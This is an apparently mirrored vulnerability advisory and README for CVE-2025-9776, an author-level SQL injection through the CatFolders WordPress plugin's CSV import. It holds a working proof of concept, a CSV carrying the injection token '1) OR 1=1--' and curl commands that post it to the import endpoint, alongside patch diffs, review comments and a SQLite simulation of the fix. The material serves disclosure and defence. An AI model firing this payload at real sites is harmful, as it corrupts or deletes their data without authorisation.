📄 WordPress CatFolders 2.5.2 SQL Injection

🗓️ 08 May 2026 00:00:00 · Reported by Kai Aizen · Type: packetstorm · 🔗 packetstorm.news · 👁 66 views

Authenticated SQL injection in CatFolders WordPress plugin via CSV import by authors.

Related

| Family | Title | Published | Reporter |
|--------|-------|-----------|----------|
| GithubExploit | Exploit for CVE-2025-9776 | 13 Sep 2025 06:24 | githubexploit |
| Circl | CVE-2025-9776 | 11 Sep 2025 06:56 | circl |
| CNNVD | WordPress plugin CatFolders SQL injection vulnerability | 11 Sep 2025 00:00 | cnnvd |
| CVE | CVE-2025-9776 | 11 Sep 2025 04:26 | cve |
| Cvelist | CVE-2025-9776 CatFolders – Tame Your WordPress Media Library by Category <= 2.5.2 - Authenticated (Author+) SQL Injection via CSV Import | 11 Sep 2025 04:26 | cvelist |
| EUVD | EUVD-2025-28906 | 3 Oct 2025 20:07 | euvd |
| NVD | CVE-2025-9776 | 11 Sep 2025 05:15 | nvd |
| Patchstack | WordPress CatFolders plugin <= 2.5.2 - Authenticated (Author+) SQL Injection via CSV Import vulnerability | 11 Sep 2025 00:56 | patchstack |
| Positive Technologies | PT-2025-37112 | 11 Sep 2025 00:00 | ptsecurity |
| RedhatCVE | CVE-2025-9776 | 13 Sep 2025 05:19 | redhatcve |
# CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin
    
    [![CVE](https://img.shields.io/badge/CVE-2025--9776-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9776)
    [![CVSS Score](https://img.shields.io/badge/CVSS-6.5%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
    [![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/catfolders/)
    [![CWE-89](https://img.shields.io/badge/CWE-89-critical)](https://cwe.mitre.org/data/definitions/89.html)
    [![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)
    
    > **Keywords:** CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025
    
    ## Table of Contents
    
    - [Overview](#overview)
    - [Vulnerability Details](#vulnerability-details)
    - [Technical Details](#technical-details)
    - [Proof of Concept](#proof-of-concept)
    - [Remediation Guide](#remediation)
    - [CVSS Metrics](#cvss-v31-metrics)
    - [References](#references)
    - [Security Contact](#contact)
    
    ## Overview
    
    An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.
    
    **Discovered by:** Kai Aizen (SnailSploit)  
    **Published:** 2025  
    **CVSS Score:** 6.5 (Medium)  
    **CWE:** CWE-89 - SQL Injection
    
    ## Vulnerability Details
    
    ### Description
    
    CatFolders – Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The `attachments` column from a user-supplied CSV is split into a list and passed directly to `FolderModel::set_attachments()` which concatenates those values into raw SQL `IN (...)` clauses without proper sanitization or parameterization.
    
    ### Impact
    
    This vulnerability allows authenticated attackers with Author-level privileges to:
    - Execute arbitrary SQL queries
    - Mass-delete or otherwise manipulate folder-attachment mappings
    - Potentially expose data, depending on the payload and database structure
    - Compromise database integrity and availability
    
    ### Affected Versions
    
    - **Vulnerable:** All versions ≤ 2.5.2
    - **Patched:** Version 2.5.3 and above (verify with vendor)
    
    ### CVSS v3.1 Metrics
    
    ```
    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
    ```
    
    | Metric | Value |
    |--------|-------|
    | Attack Vector | Network (AV:N) |
    | Attack Complexity | Low (AC:L) |
    | Privileges Required | Low (PR:L) - Author+ |
    | User Interaction | None (UI:N) |
    | Scope | Unchanged (S:U) |
    | Confidentiality | None (C:N) |
    | Integrity | Low (I:L) |
    | Availability | Low (A:L) |
    
    ## Technical Details
    
    ### Vulnerable Code Path
    
    The vulnerability exists in the CSV import workflow:
    
    **File:** `includes/Rest/Controllers/ImportController.php`
    
    1. The `import_csv` method parses the uploaded CSV without per-field sanitization.
    2. `restore_folders()` calls:
    ```php
    FolderModel::set_attachments( 
        $new_folder['id'], 
        explode(',', $folder['attachments']), 
        false 
    );
    ```
    
    **File:** `includes/Models/FolderModel.php`
    
    3. `set_attachments()` builds raw SQL using string concatenation:
    ```php
    'raw' => 'post_id IN (' . $attachmentIds . ')'
    ```
    
    4. Each element is **neither** cast to integer **nor** parameterized, allowing SQL injection.
    
    ### Attack Vector
    
    An attacker with Author-level privileges (`upload_files` capability) can inject malicious SQL through the CSV import endpoint:
    
    **Malicious CSV payload:**
    ```csv
    id,name,attachments
    1,Test Folder,"1) OR 1=1--"
    ```
    
    **Resulting vulnerable query:**
    ```sql
    SELECT folder_id FROM wp_catf_folder_posts 
    WHERE post_id IN (1) OR 1=1--)
    ```
    
    This breaks out of the `IN(...)` clause and alters query semantics, potentially affecting all rows.
    
    ### Prerequisites
    
    - Author-level account (or higher) on target WordPress site
    - CatFolders plugin installed and active
    - Access to the REST API import endpoint
    
    ## Proof of Concept
    
    ### Step 1: Discover the REST Namespace
    
    ```bash
    curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'
    ```
    
    Typical result: `/catf/v1/import-csv`
    
    ### Step 2: Prepare Malicious CSV
    
    Create a file named `catf_inject.csv`:
    
    ```csv
    id,name,attachments
    1,Malicious Folder,"1) OR 1=1--"
    ```
    
    ### Step 3: Execute the Attack
    
    ```bash
    NS="/catf/v1"  # Replace with discovered namespace
    
    curl -i \
      -u 'author_user:APPLICATION_PASSWORD' \
      -F "file=@catf_inject.csv;type=text/csv" \
      -X POST "https://target.site/wp-json${NS}/import-csv"
    ```
    
    **Expected response:**
    ```json
    { "success": true }
    ```
    
    ### Impact Demonstration
    
    The server constructs and executes:
    ```sql
    SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)
    ```
    
    This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.
    
    ### Safe Testing Environment
    
    Run the standalone SQLite simulation to observe the vulnerability safely:
    
    ```bash
    python3 poc/catfolders_sql_poc.py
    ```
    
    This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.
    
    ## Remediation
    
    ### For Site Administrators
    
    **Immediate Action Required:**
    
    1. Update CatFolders to version **2.5.3** or later
    2. Review user accounts with Author-level or higher privileges
    3. Audit database logs for suspicious queries between affected dates
    4. Check folder-attachment mappings for unexpected modifications
    
    ### For Developers
    
    **Two minimal hardening steps:**
    
    #### 1. Sanitize IDs Before Calling the Model
    
    ```diff
    - FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
    + $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
    + if ( ! empty( $ids ) ) {
    +     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
    + }
    ```
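    Review bot: `array_filter()` with no callback only drops `0`, `""` and `null`, so a negative value such as `-1` returned by `intval()` still reaches `set_attachments()` and the `IN (...)` clause; since attachment IDs are always positive, filter with an explicit predicate, e.g. `array_filter( array_map( 'intval', explode( ',', $folder['attachments'] ) ), fn( $id ) => $id > 0 )`. Note also that this hunk coerces rather than rejects: `intval( '1) OR 1=1--' )` evaluates to `1`, so a row carrying an injection attempt is imported silently with no trace for the audit log; rejecting and logging rows that contain non-numeric tokens would preserve that signal.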
    
    #### 2. Enforce Integers Inside `set_attachments()`
    
    ```diff
      $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
    + $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );
    ```
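    Review bot: this line leaves the downstream `'post_id IN (' . $attachmentIds . ')'` concatenation in place; after the `intval` cast the imploded list can only contain integers, which closes the injection, but safety then depends on every caller reaching this line before the string is built. The `$wpdb->prepare()` form with one `%d` per id, as recommended in the Stronger Recommendation section, removes that dependency. The same `array_filter()` caveat applies here: without a callback it keeps negative integers, so use a `$id > 0` predicate.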
    
    ### Stronger Recommendation
    
    Replace **all** raw SQL concatenation with parameterized queries using WordPress's `$wpdb->prepare()`:
    
    ```php
    global $wpdb;

    // Caller must ensure $imgIds is non-empty: "IN ()" is a MySQL syntax error.
    // One %d placeholder per attachment id; prepare() casts each bound argument to an integer.
    $placeholders = implode( ',', array_fill( 0, count( $imgIds ), '%d' ) );
    $query = $wpdb->prepare(
        "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
        ...$imgIds
    );
    ```
    
    **Additionally:**
    - Validate all CSV fields strictly before processing
    - Implement input type validation at the API layer
    - Add rate limiting to the import endpoint
    - Log all import operations for audit trails
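As an added, stand-alone simulation (not the repository's `poc/catfolders_sql_poc.py` and not plugin code), the following Python reproduces the concatenated `IN (...)` lookup from the Technical Details section against an in-memory SQLite table and sets it beside a hardened path that validates each attachment token as a positive integer and binds it through a placeholder, the SQLite equivalent of the `$wpdb->prepare()` fix above. The table, its rows and the CSV are constructed for the demonstration.

```python
import csv
import io
import sqlite3

# Constructed CSV in the import format the advisory shows; row 2 carries the advisory's token.
SAMPLE_CSV = """id,name,attachments
1,Benign Folder,"7,9"
2,Test Folder,"1) OR 1=1--"
"""

def parse_attachment_ids(field: str) -> list[int]:
    """Hardened parser: each comma-separated token must be a positive integer."""
    ids = []
    for token in field.split(","):
        token = token.strip()
        if not token.isdigit() or int(token) <= 0:   # '1) OR 1=1--' is refused here
            raise ValueError(f"invalid attachment id: {token!r}")
        ids.append(int(token))
    return ids

def vulnerable_lookup(conn, field: str) -> list[int]:
    # Mirrors the plugin's concatenation: the raw CSV field lands inside IN (...).
    sql = "SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (" + field + ")"
    return sorted(row[0] for row in conn.execute(sql))

def safe_lookup(conn, field: str) -> list[int]:
    # Parameterized form of the $wpdb->prepare() fix: one placeholder per validated id.
    ids = parse_attachment_ids(field)
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN ({placeholders})"
    return sorted(row[0] for row in conn.execute(sql, ids))

def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the plugin's folder/attachment mapping table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_catf_folder_posts (folder_id INTEGER, post_id INTEGER)")
    conn.executemany("INSERT INTO wp_catf_folder_posts VALUES (?, ?)", [(10, 1), (11, 7), (12, 9), (13, 42)])
    return conn

def simulate(csv_text: str = SAMPLE_CSV) -> dict:
    # Per folder name: folder_ids each path returns, or why the hardened path refused the row.
    conn, results = make_db(), {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        vuln = vulnerable_lookup(conn, row["attachments"])
        try:
            safe = safe_lookup(conn, row["attachments"])
        except ValueError as exc:
            safe = f"rejected: {exc}"
        results[row["name"]] = {"vulnerable": vuln, "hardened": safe}
    return results
```

For the benign row both paths return the same two folders; for the injected row the concatenated query matches every row in the table while the hardened path rejects the field before any SQL is built.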
    
    ### Patch File
    
    A complete patch is available in `patch/catfolders_fix.patch`
    
    ## Repository Structure
    
    ```
    CVE-2025-9776/
    ├── README.md                    # This file
    ├── poc/
    │   ├── catf_inject.csv         # Malicious CSV payload
    │   └── catfolders_sql_poc.py   # Safe SQLite simulation
    └── patch/
        └── catfolders_fix.patch    # Recommended fixes
    ```
    
    ## Timeline
    
    - **Discovery Date:** 2025
    - **Vendor Notification:** Coordinated disclosure via Wordfence
    - **Public Disclosure:** 2025
    - **Patch Available:** Version 2.5.3
    
    ## References
    
    - [MITRE CVE Entry](https://www.cve.org/CVERecord?id=CVE-2025-9776)
    - [Wordfence Intelligence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders/catfolders-tame-your-wordpress-media-library-by-category-252-authenticated-author-sql-injection-via-csv-import)
    - [WordPress Plugin Directory](https://wordpress.org/plugins/catfolders/)
    - [SnailSploit Research](https://snailsploit.com)
    
    ## Credits
    
    **Researcher:** Kai Aizen (SnailSploit)
    
    **Disclosure Process:** Coordinated through Wordfence Bug Bounty Program
    
    ## Ethical Considerations
    
    **⚠️ IMPORTANT DISCLAIMER**
    
    This Proof of Concept is provided **exclusively for defensive research and educational purposes**.
    
    ### Usage Guidelines
    
    - ✅ **DO:** Test on your own systems or with explicit written authorization
    - ✅ **DO:** Use for security training and awareness
    - ✅ **DO:** Implement the fixes in your own code
    - ❌ **DO NOT:** Test against systems without permission
    - ❌ **DO NOT:** Use for malicious purposes
    - ❌ **DO NOT:** Exploit in production environments
    
    ### Legal Notice
    
    Unauthorized access to computer systems is illegal under laws including:
    - Computer Fraud and Abuse Act (CFAA) - United States
    - Computer Misuse Act - United Kingdom  
    - Similar legislation in other jurisdictions
    
    **Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.**
    
    ## Contact
    
    For questions or additional information about this vulnerability:
    - **Email:** [email protected]
    - **LinkedIn:** [linkedin.com/in/kaiaizen](https://linkedin.com/in/kaiaizen)
    - **Website:** [snailsploit.com](https://snailsploit.com)
    - **Organization:** SnailSploit Security Research
    
    ---
    
    **Stay secure and keep your WordPress installations updated!**
    
    *Last updated: October 13, 2025*
    
    
    ---
    
    ## 📚 Documentation & Author
    
    This project's full writeup, methodology, and related research lives at:
    
    **[https://snailsploit.com/security-research/cves/cve-2025-9776/](https://snailsploit.com/security-research/cves/cve-2025-9776/)**
    
    Created by **Kai Aizen** — independent offensive security researcher.
    
    [snailsploit.com](https://snailsploit.com) · [Research](https://snailsploit.com/research) · [Frameworks](https://snailsploit.com/frameworks) · [GitHub](https://github.com/SnailSploit) · [LinkedIn](https://linkedin.com/in/kaiaizen) · [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) · [X/Twitter](https://x.com/SnailSploit)
    
    > *Same attack. Different substrate.*
    


08 May 2026 00:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 6.5
EPSS: 0.00347
SSVC
Views: 66